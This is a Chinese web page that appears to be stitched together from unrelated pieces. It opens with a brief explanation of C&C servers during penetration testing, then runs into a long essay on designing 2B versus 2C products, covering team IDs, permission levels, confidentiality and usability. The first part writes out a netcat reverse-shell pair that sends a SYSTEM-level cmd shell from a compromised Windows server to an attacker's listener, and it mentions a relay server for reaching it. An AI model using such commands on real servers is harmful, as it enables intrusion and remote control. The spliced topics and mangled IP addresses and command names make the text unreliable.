什么是C&C服务器
C&C 服务器的全称是 Command and Control Server,翻译过来就是命令和控制服务器
通常在做渗透测试的时候,在拿到一个 webshell 的时候,需要对服务器进行提权操作,如果是一台 windows 的服务器,提权的时候通常是利用本地提权漏洞的 exp 进行溢出提权,有些 exp 可以直接在后面加参数,溢出成功之后执行参数中的命令。
而有的 exp 溢出成功之后是返回一个 system 权限的 cmd,这时就需要将低权限的 cmd shell 反弹回本地,这里用 nc 在本地执行:nc -vv -lp 3333
上述命令的意思是在本地监听一个 3333 端口等待连接,假设电脑 IP 是公网的,并且 IP 为 114114114114,然后在目标服务器就可以执行:nc 114114114114 3333 -e cmdexe
上面的命令就可以把远程服务器的服务器权限的 cmd shell 返回到本地,这时你就可以通过 nc 建立的这个 shell 进行通信,发送你要执行的命令,在远程服务器接收到命令之后执行并将结果返回,这时本机电脑就是一个简易的 C&C 服务器。
扩展资料:
C&C 服务器使目标机器可以接收来自服务器的命令,从而达到服务器控制目标机器的目的。该方法常用于病毒木马控制被感染的机器。
通常只有这样内网的服务器才可以访问进行连接,所以可以使用一台中转服务器,这台中转服务器有一个公网 IP 地址是:111111111111,这样不管是目标服务器还是我们本机都可以访问这台中转服务器。
这里中转服务器的作用就是本地内网的主机监听的端口映射到公网 IP 的某个端口,这样目标机访问中转服务器监听的端口就相当于访问了我们本地监听的端口。
2b产品和2c产品,在服务对象上有很大的区别。产品第一要点:目标群体的特质化,也将导致产品的架构特质化。不同的产品,即使同是2c产品或同是2b产品,因为战略方向不同,服务群体不同,产品调性也呈现丰富多彩的差别。服务群体的不同带来的是需求的变化,使用情景的变化,使用习惯的变化。
2b产品,从大的方向上来说,服务于一个群体,产品的功能需要覆盖一群有关系的人,以及这一群人的附属环境(公司环境,工作设备,工作情景……)。这些服务的基本方向,决定了2b产品在组成上,拥有和2c产品截然不同的基本特性。
1、2b产品需要支持多个id共存,以满足团队管理
2、微信私人对话信息仅面向对话的双方开放,而群聊则面向多个用户id(对话情景不同,对话的开放性不同,涉及的id数量范围就有变化)
3、以笔记为例:2c产品,只服务于一个用户ID,用户注册登录,绑定在一个专属的id上。2b的工作笔记服务软件同一批数据,开放给多个相关的账户id,服务器记录的数据信息,绑定的对象是一个团队id(也可以是一堆个人ID,不推荐),个人id在登陆后,通过对应绑定的团队id,就可以查看团队id对应的所有数据,实现数据的多账号共享。
4、2b产品往往也支持多团队切换。举例:不同团队每个人上传的资料,对同一团队的成员都是开放共享的。那么,这样的一款团队数据共享应用,基本的账号管理中,一定需要一个多团队切换的功能,才能保证,在A团队中上传的资料,仅属于A团队,在其余团队中无法查看。
5、团队的区分是实际业务需求。2c产品的付费业务,个人付费属于个人,用在哪个群组就用在哪个群组。2b产品中,付费业务往往属于团队共有资源,例如云盘空间存储量、工作电话拨打时长、邮件和短信业务数量等。团队A购买的资源,分配给团队id,不给个人。团队id的门槛设置,就是为了将所有功能业务的数据完全隔离,进入应用,就必须先区分工作团队,给个人帐号扣上对应的团队帽子。这就将团队id的优先度提前到功能操作之上,这种产品架构,在2c产品中,往往是很少见的。
所以,在有一定复杂度的2b产品中,应用的数据应该是凭借团队id来进行区分的,而不是个人id。
2 个人id等级区分
当数据需要覆盖到多个账户ID,往往存在权限管理的需求。qq群中都需要区分管理员和普通成员,在实际团队工作中,更需要这一类身份区分的设计。这种id等级的划分,往往基于团队/公司的职位等级和岗位性质,例如,团队管理员需要知道所有队员的工作进度,老板可以查看所有成员的工作笔记,高等级的账号可以管理团队成员的添加和删除,而一般职员只能管理自己的工作业务,不能/没有权限查看、管理其他人的工作进度。
基于这种实际团队工作机制,2b产品在一个团队id对应的各项功能和数据中,有的功能和数据仅开放给特定的高级账号,其余账号只能查看管理基本数据和个人创造的数据,其余的数据没有权限访问。这种账号等级的区分,才更符合一个有一定工作复杂度的团队的实际管理。
团队权限基于团队而产生,所以,在不同的团队中,个人账号的权限是允许不同的。一个个人账号id,可以绑定多个团队id,从而以不同身份权限参与到不同团队的工作中去。切换团队,也对应切换了身份权限。这也说明了一点,2b产品的数据,更多的是凭借团队id进行隔离。
3 保密性 安全性
工作内容要求一定的保密性和安全性,这个不需要解释。信息保密的需求,2b产品会比2c产品更为迫切。2b产品往往需要考虑,如何保证工作内容、对话内容不泄露,从而诞生了一些相对特殊的产品功能。
2b产品可能不允许复制,只允许粘贴;可能设置秘密通话功能,对话内容数据24小时内自动粉碎;可能属于公司私有云服务,外网无法登录;可能高级账号可以对部分文件进行云备份;可能每一个账号的操作轨迹都会被自动记录,由高级账号进行监测;可能账号与硬件绑定,切换硬件账号失效
可能部分2b产品相比2c产品易用性会相对较低,2B产品服务价值往往远大于体验价值。设计一款优秀的2B产品,切中价值痛点,构建完整的产品维度,隔离管理相关数据,并保证数据的安全和保密,才是基本的要求。而易用,在不折损其他价值的情况下,会成为一项加分项。
2b产品在解决基本的业务需求之后,可以将产品线延伸到什么程度?除了基本业务服务,什么功能可以让产品更加成熟、更有价值?
像这种可以实现企业向外对接客户的2b产品,它的核心价值是实现人的对接,可延伸的价值应该做到人的营销。核心功能get到客户,延伸功能维护客户,并激发客户,争取让一般客户转换为忠诚客户。如果能做到这个程度,那这样的辅助客户对接的产品,对人的影响,会从对接的时候开始,一直影响到对接结束之后很长一段时间。不仅帮助平台方(B端)积累商务资源,还帮助转化商务资源。
这个轨迹可以理解为两个概念。第一,指的是工作成员的账号轨迹:7:00 A账号更新了任务,B账号参与了聊天,C账号修改了个人资料,D账号实施了一次XX界面的截屏…………巨细则由产品本身的要求来定。总而言之,处于指定团队内的所有账号的所有活跃状态,都会被记录下来,可由高级管理员进行查看、操作、删除等。这样的工作轨迹可用于:
复查信息修改情况,异常情况下可以找到恢复节点(如果产品信息允许备份并恢复的话)
明确数据的修改动态
掌握成员帐号的动态
等等
第二,可以理解为涉及的客户信息的登记轨迹。其实就是客户数据记录和管理:A先生在7月2号参与了本公司的某某发布会,在8月4号又参与了公司展览,一季度内交易金额为XXX……所有记录在案的客户信息跟踪记录并持续更新,可以帮助:
分类客户
帮助找出潜在客户
帮助有针对性地跟踪特定客户
2b公司是TOBusiness,意思是对企业的公司,2b又称B2B,也有写成BTB,是企业对企业之间的营销关系。22c公司指TOConsumer,意思是对消费者的公司。
2c又称c2c,也有写成CTC,实际是电子商务的专业用语,是个人与个人之间的电子商务。
消费市场与企业级市场有着完全不同的客户购买心理和决策逻辑,比如2C市场的用户往往是感性的,对低价,补贴和花哨的玩法比较感冒,但2B的企业级市场的购买决策更偏理性,以免费为噱头,靠烧钱获得用户的玩法并不一定适用,反而让看重安全性、可靠性的企业级用户心存忌惮。
注意事项:
2B企业往往要直接联系客户、与客户沟通、说服客户,尤其是to大B企业的创始人,一定要有说服产业界人的能力。
而许多2C企业家则往往智商很高,情商不一定高,因为2C消费品类的公司主要搞品牌,传播,只要产品触达客户即可。
2B企业家只有在行业内有较长时间的积淀,对产业有较深刻的理解,创业成功率才比较高。
2b与2c分别是什么
首先说一下,这里的2b与2c,不是二的意思,而是to,念兔。2b是to business,2c是to consumer。
近年来2b与2c的讨论甚嚣尘上,很多人根本不清楚2b与2c究竟是什么,就开始与人高谈阔论2b的产品如何如何,2c的产品如何能赚钱。
前些天在一个产品群里说了一句,“2b的产品设计成这个画风,也是很奇怪的”。很快一个实习生找到我,“2b是什么意思?”这让我萌生了写一篇文章专门解释2b与2c的念头
上文有提到,2b就是to business。字面上来看,2b就是面向公司,你的产品是给公司做的,就是2b。2c就是面向消费者,你的产品是给劳苦大众做的,就是2c。
举个例子,给贸易企业做一个CRM(Customer relationship management,客户关系管理系统)、给淘宝商家做的后台,都是2b的产品。我们日常使用的微信、淘宝、贴吧,就是面向我们这些普通的消费者,这些产品是2c的。那我们现在对2b的产品有一个大概的印象了,现在来详细叙述
2b,按照business来理解,是给企业商用的,上文的贸易企业是一个企业,淘宝商家,也可以算作一个企业。但是这个产品的使用者,依然是企业中具体的某个人,因此,2b的产品要同时面对企业代表(要不要买、要不要用的决策)和终端用户两种角色,当然,这两种角色可能重叠,比如淘宝商家。
2c,按照consumer来理解,是给个人的,微信、淘宝等产品,不是为了某些人的工作需要来设计的。这些产品是直接服务于个人,我使用这个产品,是为了满足人性中各种各样的欲望。比如我想摆脱孤独,想能时刻跟人保持联系,所以我使用微信;我喜欢看美女,享受与美女间亲密互动,所以我用YY;我喜欢刷微信、玩手机,可是手机越用越慢,很不爽,所以我用猎豹清理大师。
简单的说,2b产品的背后是业务,2c产品的背后是人性
之前跟同学一个吹牛的时候,一个词让我觉得非常有逼格——“痛点”,现在做了产品之后,越发觉得这个词重要。
但是这个痛点,是面向2c来讲的,“痛”是一种主观的感觉,通过理性的逻辑推导出来的“痛”未必真的痛。2C产品经理需要有很强的同理心,能够快速、准确地将自己代入到用户场景,想用户所想,感用户所感,自己能够感觉到切身的痛,才有可能找到真正的痛点。比如微信摇一摇,将强烈的荷尔蒙释放的欲望代入到产品设计中,才可能有摇一摇的手势、来福枪栓的音效、大门开闭漏出小红花的动画等各种微妙的情感化设计。
但是微信摇一摇这个功能,放到2b类产品里面,就不合适了。在2B产品的设计过程中,最重要的是分析业务流程、各种业务间依赖关系、穷尽业务场景等,抽象影响因素、梳理逻辑流程、推导因果关系,都是理性思维的主场。
2c产品基本没有学习成本,而2b却可以有
设计界有一本非常出名的书,《dont make me think》,这是一本关于用户体验的书。非常的浅显易懂,且在实战中有较大的用处,我在实习的时候有好几个case都参考了这本书。这本书的中心思想在于,“不要让你的用户思考”。简单的说,2c产品的每一个功能,都必须是易于理解的,尽量做到不让用户进行尝试,也就是点击某个按钮会触发什么操作用户必须有心理预期,即使没有,也应该是符合逻辑的。
但在2b产品中,并不需要做到dont make users think。2C产品的Q&A就算再精美也没人看,但在2B产品中培训手册却是必要的输出物,还要尽可能的详细。而且可能还要安排专门的培训课程,对业务人员进行系统的培训。这里的原因比较多,比如采购者与使用者不是同一个人,而前者可能并不关心使用体验,比如业务本身的复杂性和业务系统设计不当并不容易区分,比如业务系统的供给常是垄断性的,等等。
总结
不管是2b还是2c,做产品都要把逻辑理清楚。也进行了半年的实战,这段时间给我的感触就是,做2b端,最重要的是逻辑(需求他们是自己说出来)。做2c端,最重要的是需求(没人告诉你市场要的是什么,用户反馈也不代表所有人)。
更新一张自己绘制的一副图,侧重点与本文可能有所不同,有疑惑之处欢迎评论指正。
0条评论